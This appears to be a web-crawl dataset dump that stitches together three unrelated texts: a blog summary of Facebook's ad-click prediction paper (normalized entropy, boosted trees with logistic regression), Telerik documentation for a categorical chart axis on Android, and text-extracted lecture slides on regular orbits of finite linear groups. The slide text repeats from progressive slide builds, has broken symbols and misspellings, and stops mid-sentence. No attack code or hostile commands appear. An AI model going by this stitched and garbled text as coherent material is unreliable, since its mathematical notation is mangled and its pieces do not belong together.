URL
stringlengths
15
1.68k
text_list
sequencelengths
1
199
image_list
sequencelengths
1
199
metadata
stringlengths
1.19k
3.08k
http://sangho.ai/paper/review/FB/
[ "# Practical Lessons from Predicting Clicks on Ads at Facebook\n\nPublished:\n\nWant to share what I learned, feeled after I read and study the paper. Thesedays, usually study with machine learning, so will start with that category first.\n\nThe first paper to study is ‘Practical Lessons from Predicting Clicks on Ads at Facebook’ which has issued from Facebook team for predicting clicks on Ads at Facebook.\n\nLet’s start the journey.\n\n### 0. Introduction\n\nAccording to the paper, over 750 million daily active users and over 1 million active advertisers are being predicted to click on Facebook ads. Authors has improved the click prediction rate by combining decision trees with logistic regression and they described this outperformed either of these mathods on its own by over 3%.\n\n### 1-1) Data\n\nUsed offline data selected from an arbitrary week of the 2013, 4Q Then partitioned into training and test set\n\n### 1-2) Evaluation metrics\n\nUses accuracy of prediction instead of profit-revenue related metrics. In this work, uses NE and calibration as major evaluation metric.\n\n### NE (Normalized Entropy, Normalized Cross Entropy)\n\n$NE=\\frac{-\\frac{1}{N}\\sum_{i=1}^{n}\\left ( \\frac{1+y_{i}}{2} \\log \\left ( p_{i} \\right ) + \\frac{1-y_{i}}{2} \\log \\left ( 1-p_{i} \\right )\\right )}{-(p*\\log(p)+(1-p)*log(1-p))}$\n\nNE is the predictive log loss normalized by the entropy of the background CTR then it can be set as above, when training set has N examples with labels $y_{i}\\in\\left \\{-1,1 \\right \\}$ and estimated probability of click $p_{i}$. ($i=1,2,3,...N$) So as prediction accuracy is higer (as number of $y_{i}$ is larger), NE will be lower.\n\n### Calibration (Normalized Entropy, Normalized Cross Entropy)\n\nCalibration is the ratio of the average estimated CTR and empirical CTR. In other words, it is the ratio of the number of expected clicks to the number of actually observed clicks as below. $\\frac{number \\thinspace of \\thinspace actually \\thinspace observed \\thinspace clicks}{number \\thinspace of \\thinspace expected \\thinspace clicks}$\n\n### 2-1) Model structure", null, "Suggests the concatenation of boosted decision trees and of a probabilistic sparse linear classifier. For training, used SGD based linear regression and *BOPR (Bayesian online learning scheme for probit regression) To imporve the accuracy of linear classifier, there are 2 ways. 1 : Treat continuous features as categorical feature 2 : Build tuple input features like crating a new categorical feature that taking all possible values with Cartesian product. (Of course useless combinations can be pruned out)\n\nAnd boosted decision trees are a powerful and very convenient way to implement non-linear and tuple transformations described above. When you see the tree above, and assume each node has binary output like 0,1,0,1,0. Then linear classifier has binary vector input as [0,1,0,1,0]. The NE comparison table shows combination of decision tree and LR decreases NE by more than 3.4% relative to the model with no tree transforms.", null, "### 2-2) Data freshness\n\nExperiment shows data freshness effects the prediction accuracy. To maximize the data freshness, the linear online classifier is one option to train directly as the labelled Ads impressions arrive. From experiments, it shows “Per-coordinate learning rate” $\\eta_{t,i}=\\frac{\\alpha }{\\beta+\\sqrt{\\sum_{j=1}^{t}\\bigtriangledown_{j,i}^{2}}}$ has the best prediction rate for SGD-based online learning of logistic regression, compared to “per-weight square root”,”per-weight”,”global” or “constant” rate.\n\nTrained the data set and compared the prediction accuracy between LR and BOPR. Relative to LR, BOPR has a liitle bit lower NE (99.82% / 100%). One advantage of LR is smaller model size because there is only a weight associated to each feature. One advantage of BOPR is that being a Bayesian formulation, it provides a full predictive distribution over the probability of click. This can be used to compute percentiles of the predictive distribution for explore/exploit learning schemes.\n\n### 3-1) Number of Boosting tree\n\nProceed experiments with tree number 1 ~ 2000. As the number of trees increases NE decreases, but the gain from adding trees yields diminishing return as the graph of -log(x).\n\n### 3-2) Boosting features\n\nUsually, small number of features contributes the majority of explanatory power while the remaining features have only a marginal contribution. And historical features provide considerably more explanatory power than contextual features. After ordering features by importance, top 10 features are all historical features and there are only 2 features among the top 20 features.\n\nThe value of contextual features depends exclusively on current information regarding the context in which an ad is to be shown, such as the device used by the users or the current page that the user is on.\nOn the contrary, the historical features depend on previous interaction for the ad or user, for example the click through rate of the ad in last week, or the average click through rate of the user\n\n\n### 3-3) Uniform subsampling, Negative downsampling, Model Re-calibration\n\nTo reduce the cost of training, uniform subsampling is considered. To improve class imbalance between +1 and -1, negative downsampling can improve the performance After downsampling with negative label, it needs to re-calibrate the model because negative downsampling effects the performance as well. (For example, if the average CTR before samling is 0.1% and we do a 0.01 negative downsampling, the empirical CTR will become roughly 10%)\n\nCategories:" ]
[ null, "https://github.com/puhuk/puhuk.github.io/blob/master/img/FB-tree.PNG", null, "https://github.com/puhuk/puhuk.github.io/blob/master/img/FB-comp_table.PNG", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8894722,"math_prob":0.9567523,"size":5589,"snap":"2022-40-2023-06","text_gpt3_token_len":1281,"char_repetition_ratio":0.10778872,"word_repetition_ratio":0.014285714,"special_character_ratio":0.22508499,"punctuation_ratio":0.09645669,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9908923,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-05T05:52:46Z\",\"WARC-Record-ID\":\"<urn:uuid:7bed4a0d-82ad-4564-a9f6-b6018d33a153>\",\"Content-Length\":\"20382\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cb0d3d4a-1841-478d-bdfa-4a8db090f91a>\",\"WARC-Concurrent-To\":\"<urn:uuid:b5bb5892-fb7d-47c8-81e7-dc5f63c8432b>\",\"WARC-IP-Address\":\"185.199.109.153\",\"WARC-Target-URI\":\"http://sangho.ai/paper/review/FB/\",\"WARC-Payload-Digest\":\"sha1:4AMFTZ3SX5SIEMTIJ4GKFOAHGZGY6LKZ\",\"WARC-Block-Digest\":\"sha1:GZFPH5GSJE43CMHCVEPZXFULS2HIU2SJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337537.25_warc_CC-MAIN-20221005042446-20221005072446-00407.warc.gz\"}"}
https://docs.telerik.com/devtools/android/controls/chart/axes/chart-axes-categorical
[ "When RadCartesianChartView visualizes CategoricalSeries, it needs an axis that can represent the different categories. The CategoricalAxis extends the base CartesianAxis class and is used to displays a range of categories. Categories are built depending on the Category value of each CategoricalDataPoint present in the owning CategoricalSeries chart series. The axis is divided into discrete slots and each data point is visualized in the slot corresponding to its categorical value.\n\nThe CategoricalAxis extends the base CartesianAxis class and is used to displays a range of categories. Categories are built depending on the `Category` value of each `CategoricalDataPoint` present in the owning CategoricalSeries chart series. The axis is divided into discrete slots and each data point is visualized in the slot corresponding to its categorical value.\n\n## Example\n\nYou can read from the Getting Started page how to define the `MonthResult` type and declare the initData() method.\n\nAfter you create the method for initialization of sample data, you can create a RadCartesianChartView with LineSeries by adding the following code to the onCreate() method of your Activity.\n\n`````` initData();\n\nLineSeries lineSeries = new LineSeries();\nlineSeries.setCategoryBinding(new PropertyNameDataPointBinding(\"Month\"));\nlineSeries.setValueBinding(new PropertyNameDataPointBinding(\"Result\"));\nlineSeries.setData(this.monthResults);\n\nCategoricalAxis horizontalAxis = new CategoricalAxis();\nchartView.setHorizontalAxis(horizontalAxis);\n\nLinearAxis verticalAxis = new LinearAxis();\nchartView.setVerticalAxis(verticalAxis);\n\nViewGroup rootView = (ViewGroup)findViewById(R.id.container);\n``````\n`````` InitData();\n\nLineSeries lineSeries = new LineSeries();\nlineSeries.CategoryBinding = new MonthResultDataBinding (\"Month\");\nlineSeries.ValueBinding = new MonthResultDataBinding (\"Result\");\nlineSeries.Data = (Java.Lang.IIterable)this.monthResults;\n\nCategoricalAxis horizontalAxis = new CategoricalAxis();\nchartView.HorizontalAxis = horizontalAxis;\n\nLinearAxis verticalAxis = new LinearAxis();\nchartView.VerticalAxis = verticalAxis;\n\nViewGroup rootView = (ViewGroup)FindViewById(Resource.Id.container);\n``````\n\nThis example assumes that you root container has id `container`\n\nHere's the result:", null, "## Features\n\n### Plot Mode\n\nThe CategoricalAxis allows you to define how exactly the axis will be plotted on the viewport of the chart. The possible values are:\n\n• AxisPlotMode.BETWEEN_TICKS: Points are plotted in the middle of the range, defined between each two ticks.\n• AxisPlotMode.ON_TICKS: Points are plotted over each tick.\n• AxisPlotMode.ON_TICKS_PADDED: Points are plotted over each tick with half a step padding applied on both ends of the axis.\n\nYou can get the current value with the getPlotMode() method and change the value with the setPlotMode(AxisPlotMode) method.\n\n### Gap Length\n\nDefines the distance (in logical units) between two adjacent categories. Default value is `0.3`. For example if you have BarSeries, you can decrease the space between the bars from the different categories by setting the Gap Length to a value lower than `0.3`. You can get the current value with getGapLength() and set a new value with setGapLength(double). The possible values are from the `(0, 1)` interval.\n\n### Major Tick Interval\n\nDefines the step at which major ticks are generated. The default and also minimum value is 1. This property also affects axis labels as they are generated on a per major tick basis. You can get the current value with the getMajorTicksInterval() method and set a new value with setMajorTickInterval(int). For example, if you don't want to display all ticks, but instead only half of them (display the first, third, fifth, etc. ticks), you should set the major tick interval to `2`:\n\n`````` horizontalAxis.setMajorTickInterval(2);\n``````\n`````` horizontalAxis.MajorTickInterval = 2;\n``````" ]
[ null, "https://docs.telerik.com/devtools/android/controls/chart/axes/images/chart-axes-categorical-1.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.71218413,"math_prob":0.90350145,"size":3702,"snap":"2019-13-2019-22","text_gpt3_token_len":766,"char_repetition_ratio":0.16657653,"word_repetition_ratio":0.29039302,"special_character_ratio":0.18071313,"punctuation_ratio":0.15437393,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9748547,"pos_list":[0,1,2],"im_url_duplicate_count":[null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-23T16:24:18Z\",\"WARC-Record-ID\":\"<urn:uuid:99d6b947-3d53-4319-9f18-30d3d16f4b82>\",\"Content-Length\":\"11540\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:115201b7-58cf-4c60-b14f-8124f123e6ae>\",\"WARC-Concurrent-To\":\"<urn:uuid:c5b539b7-e9b1-449c-a209-948b3cd63ba5>\",\"WARC-IP-Address\":\"50.56.17.213\",\"WARC-Target-URI\":\"https://docs.telerik.com/devtools/android/controls/chart/axes/chart-axes-categorical\",\"WARC-Payload-Digest\":\"sha1:PZ444MTSM5ESI5BCHEYKVDED6K2W45IN\",\"WARC-Block-Digest\":\"sha1:NFSV32X4QVZ53ECAN5PYMYSGZ7RG7CNE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912202889.30_warc_CC-MAIN-20190323161556-20190323183556-00507.warc.gz\"}"}
https://5doc.co/document/zx5n0llv-regular-orbits.html
[ "# Regular orbits\n\nN/A\nN/A\nProtected\n\nShare \"Regular orbits\"\n\nCopied!\n82\n0\n0\n\nFull text\n\n(1)\n\n### Orbits of linear groups\n\nMartin Liebeck\n\nImperial College London\n\n(2)\n\nLetG ≤GLn(F) =GL(V), Fa field, G finite.\n\nWill discuss results on orbits ofG onV:\n\n1 Regular orbits\n\n2 Number of orbits\n\n3 Arithmetic conditions on orbit sizes, applications\n\nCorresponding affine permutation groupH :=VG ≤AGL(V), V = translation subgroup,G =H0 stabilizer of zero vector. Orbits ofG aresuborbits ofH, andHis primitive iff G is irreducible onV.\n\n(3)\n\nLetG ≤GLn(F) =GL(V), Fa field, G finite.\n\nWill discuss results on orbits ofG onV:\n\n1 Regular orbits\n\n2 Number of orbits\n\n3 Arithmetic conditions on orbit sizes, applications\n\nCorresponding affine permutation groupH :=VG ≤AGL(V), V = translation subgroup,G =H0 stabilizer of zero vector. Orbits ofG aresuborbits ofH, andHis primitive iff G is irreducible onV.\n\n(4)\n\nLetG ≤GLn(F) =GL(V), Fa field, G finite.\n\nWill discuss results on orbits ofG onV:\n\n1 Regular orbits\n\n2 Number of orbits\n\n3 Arithmetic conditions on orbit sizes, applications\n\nCorresponding affine permutation groupH :=VG ≤AGL(V), V = translation subgroup,G =H0 stabilizer of zero vector. Orbits ofG aresuborbits ofH, andHis primitive iff G is irreducible onV.\n\n(5)\n\nLetG ≤GLn(F) =GL(V), Fa field, G finite.\n\nWill discuss results on orbits ofG onV:\n\n1 Regular orbits\n\n2 Number of orbits\n\n3 Arithmetic conditions on orbit sizes, applications\n\nCorresponding affine permutation groupH :=VG ≤AGL(V), V = translation subgroup,G =H0 stabilizer of zero vector. Orbits ofG aresuborbits ofH, andHis primitive iff G is irreducible onV.\n\n(6)\n\nLetG ≤GLn(F) =GL(V), Fa field, G finite.\n\nWill discuss results on orbits ofG onV:\n\n1 Regular orbits\n\n2 Number of orbits\n\n3 Arithmetic conditions on orbit sizes, applications\n\nCorresponding affine permutation groupH:=VG ≤AGL(V), V = translation subgroup,G =H0 stabilizer of zero vector. Orbits ofG aresuborbits ofH, andHis primitive iff G is irreducible onV.\n\n(7)\n\n### Regular orbits\n\nLetG ≤GLn(F) =GL(V). ThenG has aregular orbit onV if∃ v∈V\\0 such thatGv = 1. Regular orbit is vG ={vg :g ∈G}, size|G|.\n\nIfH=VG ≤AGL(V) is corresponding affine permutation group onV, this saysH0v = 1, i.e. H has abase of size 2.\n\nDo regular orbits exist?\n\nSometimes no: eg. ifG =GLn(q) (where F=Fq finite). In general, no regular orbit if|G| ≥ |V|.\n\nSometimes yes: eg. G =�s�,s a Singer cycle inGLn(q) of order qn−1.\n\n(8)\n\n### Regular orbits\n\nLetG ≤GLn(F) =GL(V). ThenG has a regular orbit onV if∃ v∈V\\0 such thatGv = 1. Regular orbit is vG ={vg :g ∈G}, size|G|.\n\nIfH=VG ≤AGL(V) is corresponding affine permutation group onV, this saysH0v = 1, i.e. H has abase of size 2.\n\nDo regular orbits exist?\n\nSometimes no: eg. ifG =GLn(q) (where F=Fq finite). In general, no regular orbit if|G| ≥ |V|.\n\nSometimes yes: eg. G =�s�,s a Singer cycle inGLn(q) of order qn−1.\n\n(9)\n\n### Regular orbits\n\nLetG ≤GLn(F) =GL(V). ThenG has a regular orbit onV if∃ v∈V\\0 such thatGv = 1. Regular orbit is vG ={vg :g ∈G}, size|G|.\n\nIfH=VG ≤AGL(V) is corresponding affine permutation group onV, this saysH0v = 1, i.e. H has abase of size 2.\n\nDo regular orbits exist?\n\nSometimes no: eg. ifG =GLn(q) (where F=Fq finite). In general, no regular orbit if|G| ≥ |V|.\n\nSometimes yes: eg. G =�s�,s a Singer cycle inGLn(q) of order qn−1.\n\n(10)\n\n### Regular orbits\n\nLetG ≤GLn(F) =GL(V). ThenG has a regular orbit onV if∃ v∈V\\0 such thatGv = 1. Regular orbit is vG ={vg :g ∈G}, size|G|.\n\nIfH=VG ≤AGL(V) is corresponding affine permutation group onV, this saysH0v = 1, i.e. H has abase of size 2.\n\nDo regular orbits exist?\n\nSometimes no: eg. ifG =GLn(q) (where F=Fq finite). In general, no regular orbit if|G| ≥ |V|.\n\nSometimes yes: eg. G =�s�,s a Singer cycle inGLn(q) of order qn−1.\n\n(11)\n\n### Regular orbits\n\nLetG ≤GLn(F) =GL(V). ThenG has a regular orbit onV if∃ v∈V\\0 such thatGv = 1. Regular orbit is vG ={vg :g ∈G}, size|G|.\n\nIfH=VG ≤AGL(V) is corresponding affine permutation group onV, this saysH0v = 1, i.e. H has abase of size 2.\n\nDo regular orbits exist?\n\nSometimes no: eg. ifG =GLn(q) (where F=Fq finite).\n\nIn general, no regular orbit if|G| ≥ |V|.\n\nSometimes yes: eg. G =�s�,s a Singer cycle inGLn(q) of order qn−1.\n\n(12)\n\n### Regular orbits\n\nLetG ≤GLn(F) =GL(V). ThenG has a regular orbit onV if∃ v∈V\\0 such thatGv = 1. Regular orbit is vG ={vg :g ∈G}, size|G|.\n\nIfH=VG ≤AGL(V) is corresponding affine permutation group onV, this saysH0v = 1, i.e. H has abase of size 2.\n\nDo regular orbits exist?\n\nSometimes no: eg. ifG =GLn(q) (where F=Fq finite). In general, no regular orbit if|G| ≥ |V|.\n\nSometimes yes: eg. G =�s�,s a Singer cycle inGLn(q) of order qn−1.\n\n(13)\n\n### Regular orbits\n\nLetG ≤GLn(F) =GL(V). ThenG has a regular orbit onV if∃ v∈V\\0 such thatGv = 1. Regular orbit is vG ={vg :g ∈G}, size|G|.\n\nIfH=VG ≤AGL(V) is corresponding affine permutation group onV, this saysH0v = 1, i.e. H has abase of size 2.\n\nDo regular orbits exist?\n\nSometimes no: eg. ifG =GLn(q) (where F=Fq finite). In general, no regular orbit if|G| ≥ |V|.\n\nSometimes yes: eg. G =�s�,s a Singer cycle inGLn(q) of order qn−1.\n\n(14)\n\n### Regular orbits\n\nWhenFis infinite:\n\nLemma Let G ≤GLn(F) =GL(V), G finite, Finfinite. Then G has a regular orbit on V .\n\nProof Suppose false. ThenGv �= 1 ∀v ∈V. So everyv ∈V lies inCV(g) :={v ∈V :vg =v} for someg ∈G\\1, ie.\n\nV = �\n\ng∈G\\1\n\nCV(g).\n\nBut asFis infinite, V is not a union of finitely many proper subspaces. Contradiction.\n\nForF finite this argument shows ∃regular orbit ifF finite and\n\n|F|>|G|.\n\n(15)\n\n### Regular orbits\n\nWhenFis infinite:\n\nLemma Let G ≤GLn(F) =GL(V), G finite,F infinite. Then G has a regular orbit on V .\n\nProof Suppose false. ThenGv �= 1 ∀v ∈V. So everyv ∈V lies inCV(g) :={v ∈V :vg =v} for someg ∈G\\1, ie.\n\nV = �\n\ng∈G\\1\n\nCV(g).\n\nBut asFis infinite, V is not a union of finitely many proper subspaces. Contradiction.\n\nForF finite this argument shows ∃regular orbit ifF finite and\n\n|F|>|G|.\n\n(16)\n\n### Regular orbits\n\nWhenFis infinite:\n\nLemma Let G ≤GLn(F) =GL(V), G finite,F infinite. Then G has a regular orbit on V .\n\nProof Suppose false. ThenGv �= 1 ∀v ∈V.\n\nSo every v ∈V lies inCV(g) :={v ∈V :vg =v} for someg ∈G\\1, ie.\n\nV = �\n\ng∈G\\1\n\nCV(g).\n\nBut asFis infinite, V is not a union of finitely many proper subspaces. Contradiction.\n\nForF finite this argument shows ∃regular orbit ifF finite and\n\n|F|>|G|.\n\n(17)\n\n### Regular orbits\n\nWhenFis infinite:\n\nLemma Let G ≤GLn(F) =GL(V), G finite,F infinite. Then G has a regular orbit on V .\n\nProof Suppose false. ThenGv �= 1 ∀v ∈V. So everyv ∈V lies inCV(g) :={v ∈V :vg =v} for someg ∈G\\1, ie.\n\nV = �\n\ng∈G\\1\n\nCV(g).\n\nBut asFis infinite, V is not a union of finitely many proper subspaces. Contradiction.\n\nForF finite this argument shows ∃regular orbit ifF finite and\n\n|F|>|G|.\n\n(18)\n\n### Regular orbits\n\nWhenFis infinite:\n\nLemma Let G ≤GLn(F) =GL(V), G finite,F infinite. Then G has a regular orbit on V .\n\nProof Suppose false. ThenGv �= 1 ∀v ∈V. So everyv ∈V lies inCV(g) :={v ∈V :vg =v} for someg ∈G\\1, ie.\n\nV = �\n\ngG\\1\n\nCV(g).\n\nBut asFis infinite, V is not a union of finitely many proper subspaces. Contradiction.\n\nForF finite this argument shows ∃regular orbit ifF finite and\n\n|F|>|G|.\n\n(19)\n\n### Regular orbits\n\nWhenFis infinite:\n\nLemma Let G ≤GLn(F) =GL(V), G finite,F infinite. Then G has a regular orbit on V .\n\nProof Suppose false. ThenGv �= 1 ∀v ∈V. So everyv ∈V lies inCV(g) :={v ∈V :vg =v} for someg ∈G\\1, ie.\n\nV = �\n\ngG\\1\n\nCV(g).\n\nBut asFis infinite, V is not a union of finitely many proper subspaces. Contradiction.\n\nForF finite this argument shows ∃regular orbit ifF finite and\n\n|F|>|G|.\n\n(20)\n\n### Regular orbits\n\nWhenFis infinite:\n\nLemma Let G ≤GLn(F) =GL(V), G finite,F infinite. Then G has a regular orbit on V .\n\nProof Suppose false. ThenGv �= 1 ∀v ∈V. So everyv ∈V lies inCV(g) :={v ∈V :vg =v} for someg ∈G\\1, ie.\n\nV = �\n\ngG\\1\n\nCV(g).\n\nBut asFis infinite, V is not a union of finitely many proper subspaces. Contradiction.\n\nForF finite this argument shows∃ regular orbit ifF finite and\n\n|F|>|G|.\n\n(21)\n\n### Regular orbits\n\nWhenF=Fq finite,G ≤GLn(q) =GL(V):\n\nAim (i) If|G| ≥ |V|,G has no regular orbit onV\n\n(ii) If|G|<|V|, proveG has a regular orbit, with the following exceptions....????\n\nFar off. Delicate:\n\nExample 1 Let G =Sc <GLc−1(p) =GL(V), where p >c and V ={(a1, . . . ,ac) :ai ∈Fp,�\n\nai = 0}. Then G has regular orbits onV. Number of regular orbits is\n\n1\n\nc!(p−1)(p−2)· · ·(p−c+ 1).\n\nExample 2 Let G =Sc×C2 <GLc1(p) =GL(V), where p=c+ 1, V as above, C2 =�−1V�. ThenG has no regular orbits onV.\n\n(22)\n\n### Regular orbits\n\nWhenF=Fq finite,G ≤GLn(q) =GL(V):\n\nAim (i) If|G| ≥ |V|,G has no regular orbit onV\n\n(ii) If|G|<|V|, proveG has a regular orbit, with the following exceptions....????\n\nFar off. Delicate:\n\nExample 1 Let G =Sc <GLc−1(p) =GL(V), where p >c and V ={(a1, . . . ,ac) :ai ∈Fp,�\n\nai = 0}. Then G has regular orbits onV. Number of regular orbits is\n\n1\n\nc!(p−1)(p−2)· · ·(p−c+ 1).\n\nExample 2 Let G =Sc×C2 <GLc1(p) =GL(V), where p=c+ 1, V as above, C2 =�−1V�. ThenG has no regular orbits onV.\n\n(23)\n\n### Regular orbits\n\nWhenF=Fq finite,G ≤GLn(q) =GL(V):\n\nAim (i) If|G| ≥ |V|,G has no regular orbit onV\n\n(ii) If|G|<|V|, proveG has a regular orbit, with the following exceptions....????\n\nFar off. Delicate:\n\nExample 1 Let G =Sc <GLc−1(p) =GL(V), where p >c and V ={(a1, . . . ,ac) :ai ∈Fp,�\n\nai = 0}. ThenG has regular orbits onV. Number of regular orbits is\n\n1\n\nc!(p−1)(p−2)· · ·(p−c+ 1).\n\nExample 2 Let G =Sc×C2 <GLc1(p) =GL(V), where p=c+ 1, V as above, C2 =�−1V�. ThenG has no regular orbits onV.\n\n(24)\n\n### Regular orbits\n\nWhenF=Fq finite,G ≤GLn(q) =GL(V):\n\nAim (i) If|G| ≥ |V|,G has no regular orbit onV\n\n(ii) If|G|<|V|, proveG has a regular orbit, with the following exceptions....????\n\nFar off. Delicate:\n\nExample 1 Let G =Sc <GLc−1(p) =GL(V), where p >c and V ={(a1, . . . ,ac) :ai ∈Fp,�\n\nai = 0}. ThenG has regular orbits onV. Number of regular orbits is\n\n1\n\nc!(p−1)(p−2)· · ·(p−c+ 1).\n\nExample 2 Let G =Sc×C2 <GLc1(p) =GL(V), where p=c+ 1, V as above, C2 =�−1V�. ThenG has no regular orbits onV.\n\n(25)\n\n### More on egular orbits\n\nIn general letG <GLn(q) with q varying, but fixed Brauer\n\ncharacter ofG. There is a poly f(x) of degree n such that number of regular orbits ofG is f(q). So ∃regular orbits for all but at mostn values ofq.\n\nEg. G =Sc <GLc−1(q), char(Fq)>n: here\n\nf(q) = c!1(q−1)(q−2)· · ·(q−c+ 1). This is a poly in q with roots equal to the exponents of the Weyl groupW(Ac1)∼=Sc. Same holds for all finite reflection groups in their natural\n\nrepresentations (Orlik-Solomon). Eg. forG =W(F4)<GL4(q), number of regular orbits\n\n1\n\n|W(F4)|(q−1)(q−5)(q−7)(q−11).\n\nNot always so nice, eg. forG =PSL2(7)<GL3(q) (of index 2 in a unitary reflection group),f(q) = 1681 (q−1)(q2+q−48).\n\n(26)\n\n### More on egular orbits\n\nIn general letG <GLn(q) with q varying, but fixed Brauer\n\ncharacter ofG. There is a poly f(x) of degree n such that number of regular orbits ofG is f(q).\n\nSo ∃regular orbits for all but at mostn values ofq.\n\nEg. G =Sc <GLc−1(q), char(Fq)>n: here\n\nf(q) = c!1(q−1)(q−2)· · ·(q−c+ 1). This is a poly in q with roots equal to the exponents of the Weyl groupW(Ac1)∼=Sc. Same holds for all finite reflection groups in their natural\n\nrepresentations (Orlik-Solomon). Eg. forG =W(F4)<GL4(q), number of regular orbits\n\n1\n\n|W(F4)|(q−1)(q−5)(q−7)(q−11).\n\nNot always so nice, eg. forG =PSL2(7)<GL3(q) (of index 2 in a unitary reflection group),f(q) = 1681 (q−1)(q2+q−48).\n\n(27)\n\n### More on egular orbits\n\nIn general letG <GLn(q) with q varying, but fixed Brauer\n\ncharacter ofG. There is a poly f(x) of degree n such that number of regular orbits ofG is f(q). So ∃regular orbits for all but at mostn values ofq.\n\nEg. G =Sc <GLc−1(q), char(Fq)>n: here\n\nf(q) = c!1(q−1)(q−2)· · ·(q−c+ 1). This is a poly in q with roots equal to the exponents of the Weyl groupW(Ac1)∼=Sc. Same holds for all finite reflection groups in their natural\n\nrepresentations (Orlik-Solomon). Eg. forG =W(F4)<GL4(q), number of regular orbits\n\n1\n\n|W(F4)|(q−1)(q−5)(q−7)(q−11).\n\nNot always so nice, eg. forG =PSL2(7)<GL3(q) (of index 2 in a unitary reflection group),f(q) = 1681 (q−1)(q2+q−48).\n\n(28)\n\n### More on egular orbits\n\nIn general letG <GLn(q) with q varying, but fixed Brauer\n\ncharacter ofG. There is a poly f(x) of degree n such that number of regular orbits ofG is f(q). So ∃regular orbits for all but at mostn values ofq.\n\nEg. G =Sc <GLc1(q), char(Fq)>n: here\n\nf(q) = c!1(q−1)(q−2)· · ·(q−c+ 1). This is a poly in q with roots equal to the exponents of the Weyl groupW(Ac1)∼=Sc.\n\nSame holds for all finite reflection groups in their natural\n\nrepresentations (Orlik-Solomon). Eg. forG =W(F4)<GL4(q), number of regular orbits\n\n1\n\n|W(F4)|(q−1)(q−5)(q−7)(q−11).\n\nNot always so nice, eg. forG =PSL2(7)<GL3(q) (of index 2 in a unitary reflection group),f(q) = 1681 (q−1)(q2+q−48).\n\n(29)\n\n### More on egular orbits\n\nIn general letG <GLn(q) with q varying, but fixed Brauer\n\ncharacter ofG. There is a poly f(x) of degree n such that number of regular orbits ofG is f(q). So ∃regular orbits for all but at mostn values ofq.\n\nEg. G =Sc <GLc1(q), char(Fq)>n: here\n\nf(q) = c!1(q−1)(q−2)· · ·(q−c+ 1). This is a poly in q with roots equal to the exponents of the Weyl groupW(Ac1)∼=Sc. Same holds for all finite reflection groups in their natural\n\nrepresentations (Orlik-Solomon). Eg. forG =W(F4)<GL4(q), number of regular orbits\n\n1\n\n|W(F4)|(q−1)(q−5)(q−7)(q−11).\n\nNot always so nice, eg. forG =PSL2(7)<GL3(q) (of index 2 in a unitary reflection group),f(q) = 1681 (q−1)(q2+q−48).\n\n(30)\n\n### More on egular orbits\n\nIn general letG <GLn(q) with q varying, but fixed Brauer\n\ncharacter ofG. There is a poly f(x) of degree n such that number of regular orbits ofG is f(q). So ∃regular orbits for all but at mostn values ofq.\n\nEg. G =Sc <GLc1(q), char(Fq)>n: here\n\nf(q) = c!1(q−1)(q−2)· · ·(q−c+ 1). This is a poly in q with roots equal to the exponents of the Weyl groupW(Ac1)∼=Sc. Same holds for all finite reflection groups in their natural\n\nrepresentations (Orlik-Solomon). Eg. forG =W(F4)<GL4(q), number of regular orbits\n\n1\n\n|W(F4)|(q−1)(q−5)(q−7)(q−11).\n\nNot always so nice, eg. forG =PSL2(7)<GL3(q) (of index 2 in a unitary reflection group),f(q) = 1681 (q−1)(q2+q−48).\n\n(31)\n\n### Still more on regular orbits\n\nGeneral theory (Pahlings-Plesken): G <GLn(q) with q varying, fixed Brauer character. For each subgroupH <G there is a poly fH(q) of degree dimCV(H) such that number of orbits ofG with stabilizer conjugate toH isfH(q). ∃methods for computing these polys using “table of marks” ofG.\n\nEg. here’s the table of marks forA5: A5/C1 60\n\nA5/C2 30 2 A5/C3 20 2 A5/V4 15 3 3\n\nA5/C5 12 2\n\nA5/S3 10 2 1 1\n\nA5/D10 6 2 1 1\n\nA5/A4 5 1 2 1 1\n\nA5/A5 1 1 1 1 1 1 1 1 1\n\nC1 C2 C3 V4 C5 S3 D10 A4 A5\n\n(32)\n\n### Still more on regular orbits\n\nGeneral theory (Pahlings-Plesken): G <GLn(q) with q varying, fixed Brauer character. For each subgroupH <G there is a poly fH(q) of degree dimCV(H) such that number of orbits ofG with stabilizer conjugate toH isfH(q). ∃ methods for computing these polys using “table of marks” ofG.\n\nEg. here’s the table of marks forA5: A5/C1 60\n\nA5/C2 30 2 A5/C3 20 2 A5/V4 15 3 3\n\nA5/C5 12 2\n\nA5/S3 10 2 1 1\n\nA5/D10 6 2 1 1\n\nA5/A4 5 1 2 1 1\n\nA5/A5 1 1 1 1 1 1 1 1 1\n\nC1 C2 C3 V4 C5 S3 D10 A4 A5\n\n(33)\n\n### Still more on regular orbits\n\nGeneral theory (Pahlings-Plesken): G <GLn(q) with q varying, fixed Brauer character. For each subgroupH <G there is a poly fH(q) of degree dimCV(H) such that number of orbits ofG with stabilizer conjugate toH isfH(q). ∃ methods for computing these polys using “table of marks” ofG.\n\nEg. here’s the table of marks forA5: A5/C1 60\n\nA5/C2 30 2 A5/C3 20 2 A5/V4 15 3 3\n\nA5/C5 12 2\n\nA5/S3 10 2 1 1\n\nA5/D10 6 2 1 1\n\nA5/A4 5 1 2 1 1\n\nA5/A5 1 1 1 1 1 1 1 1 1\n\nC1 C2 C3 V4 C5 S3 D10 A4 A5\n\n(34)\n\n### Yet more on regular orbits\n\nRegular orbits ofG <GLn(q) crop up in several areas. A couple of examples:\n\n1. Supposeallorbits regular, ie. Gv = 1∀v ∈V\\0. Then affine groupH=VG ≤AGL(V) is a Frobenius group(Hvw = 1∀v,w) andG aFrobenius complement. Classified by Zassenhaus. Eg. SL2(5)<GL2(q) (char 